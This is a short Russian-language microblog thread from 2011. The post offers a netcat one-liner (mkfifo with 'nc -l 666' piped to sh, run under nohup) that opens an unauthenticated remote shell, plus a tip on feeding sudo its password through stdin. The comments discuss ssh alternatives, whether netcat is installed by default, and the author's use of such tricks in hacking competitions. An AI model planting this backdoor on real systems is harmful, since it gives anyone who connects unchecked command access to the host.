utros — Я хакир! Самый простой способ получить ...

utros 29.11.2011 18:31 eoranged

Я хакир! Самый простой способ получить почти полноценный удалённый шелл от текущего пользователя:
mkfifo /tmp/shellio ; nohup nc -l 666 </tmp/shellio | sh >/tmp/shellio 2>&1 &
Для sudo нужно указывать параметр -S и пароль будет читаться из stdin.
Принимаются другие идеи по организации сего извращения, желательно только средствами, которые обязательно есть в системе по всяким POSIX-стандартам или де факто.

linux, orangeбред

#otgzgn

20 comments

recommend

bookmark

tree plain

1. 0x2207 29.11.2011 18:32 epsilon/psi

ssh пробовал?

#otgzgn/1

2. muhas 29.11.2011 18:32 tmp

ssh чем не угодил?

#otgzgn/2

3. utros → 0x2207 /1 29.11.2011 18:33 eoranged

Ему нужно конфиг создавать и не факт, что удастся нормально запустить из-под текущего пользователя.

#otgzgn/3

4. eurekafag 29.11.2011 18:33 WOK

Нетката по дефолту нет. Саси.

#otgzgn/4

5. 0x2207 → eurekafag /4 29.11.2011 18:33 epsilon/psi

это кстати верное замечание

#otgzgn/5

6. utros → eurekafag /4 29.11.2011 18:34 eoranged

Де-факто он есть везде по умолчанию. Не встречал ещё систем, кроме LFS, где его не было бы.

#otgzgn/6

7. utros 29.11.2011 18:37 eoranged

И да, это шелл не для обычного администрирования, а для всяких стрёмных случаев, когда получить полноценный доступ к серверу — проблема.

#otgzgn/7

8. eurekafag → utros /7 29.11.2011 18:38 WOK

Зная тебя, я уверен, такие случаи происходят постоянно.

#otgzgn/8

9. utros → eurekafag /8 29.11.2011 18:40 eoranged

Лол, у меня на такие случаи knockd и скрипт, проверяющий конфигурацию iptables висят.
Хотя, ты прав: во время всяких соревнований достаточно часто приходится искать и эксплуатировать подобные дырки :)

#otgzgn/9